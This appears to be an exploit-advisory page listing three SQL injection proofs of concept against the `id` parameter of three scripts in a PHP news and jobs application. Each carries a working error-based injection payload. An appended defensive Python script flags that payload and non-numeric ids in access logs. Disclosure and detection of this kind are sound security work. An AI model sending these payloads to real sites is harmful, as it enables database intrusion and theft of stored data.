| CVE | Category | Price | Severity |
|---|---|---|---|
| N/A | CWE-89 | $5000 | High |

| Author | Risk | Exploitation Type | Date |
|---|---|---|---|
| Unknown | High | Remote | 2019-03-26 |

| CVSS | EPSS | EPSSP |
|---|---|---|
| CVSS:4.0/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H | 0.039 | 0.7 |
----- PoC 1: SQLi -----
Request: http://localhost/[PATH]/news_details.php?id=1
Vulnerable Parameter: id (GET)
Payload: id=-5236" OR 1 GROUP BY CONCAT(0x716a627871,(SELECT (CASE WHEN (5640=5640) THEN 1 ELSE 0 END)),0x71626b6271,FLOOR(RAND(0)*2)) HAVING MIN(0)#

----- PoC 2: SQLi -----
Request: http://localhost/[PATH]/jobs_details.php?id=1
Vulnerable Parameter: id (GET)
Payload: id=-5236" OR 1 GROUP BY CONCAT(0x716a627871,(SELECT (CASE WHEN (5640=5640) THEN 1 ELSE 0 END)),0x71626b6271,FLOOR(RAND(0)*2)) HAVING MIN(0)#

----- PoC 3: SQLi -----
Request: http://localhost/[PATH]/job_cmp_details.php?id=1
Vulnerable Parameter: id (GET)
Payload: id=-5236" OR 1 GROUP BY CONCAT(0x716a627871,(SELECT (CASE WHEN (5640=5640) THEN 1 ELSE 0 END)),0x71626b6271,FLOOR(RAND(0)*2)) HAVING MIN(0)#
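
A defender's check for the requests in the PoCs above, as an added example that is not part of the original advisory: it scans access-log lines for the three listed scripts and flags an `id` value that carries the GROUP BY CONCAT(...) FLOOR(RAND(0)*2) error-based pattern or is not a plain integer. The combined log format, the `/app` path standing in for `[PATH]`, the client address and the rule that a legitimate `id` is a non-negative integer are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qs, quote, urlsplit

# The three scripts named in the PoCs above.
AFFECTED = {"news_details.php", "jobs_details.php", "job_cmp_details.php"}
# Signature of the error-based payload shown on the page.
ERROR_BASED = re.compile(
    r"group\s+by\s+concat\s*\(.*floor\s*\(\s*rand\s*\(", re.I | re.S)
# Request field of a combined-format access-log line (assumed log format).
REQUEST = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')


def classify(log_line):
    """Return 'error-based-sqli', 'non-numeric-id' or None for one log line."""
    m = REQUEST.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if url.path.rsplit("/", 1)[-1] not in AFFECTED:
        return None
    # parse_qs percent-decodes, so encoded quotes, spaces and '#' are seen as sent.
    values = parse_qs(url.query, keep_blank_values=True).get("id", [])
    if any(ERROR_BASED.search(v) for v in values):
        return "error-based-sqli"
    # Assumption: a legitimate id is a non-negative integer, as in "id=1".
    if any(not re.fullmatch(r"[0-9]+", v) for v in values):
        return "non-numeric-id"
    return None


def _line(target):
    # Constructed log line; address, timestamp and size are sample values.
    return (f'203.0.113.7 - - [26/Mar/2019:10:00:00 +0000] '
            f'"GET {target} HTTP/1.1" 200 512')


# Payload value copied from the PoCs above, percent-encoded as a client sends it.
PAYLOAD = ('-5236" OR 1 GROUP BY CONCAT(0x716a627871,(SELECT (CASE WHEN '
           '(5640=5640) THEN 1 ELSE 0 END)),0x71626b6271,FLOOR(RAND(0)*2)) '
           'HAVING MIN(0)#')
SAMPLE = [  # constructed requests; "/app" stands in for [PATH]
    _line("/app/news_details.php?id=1"),
    _line("/app/jobs_details.php?id=" + quote(PAYLOAD, safe="")),
    _line("/app/job_cmp_details.php?id=7%27"),
    _line("/app/index.php?id=abc"),
]

if __name__ == "__main__":
    for entry in SAMPLE:
        print(classify(entry), entry[:90])
```

A hit from this check is a triage signal only; the underlying CWE-89 fix is to bind `id` as a typed parameter in the three scripts.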
Copyright ©2024 Exploitalert.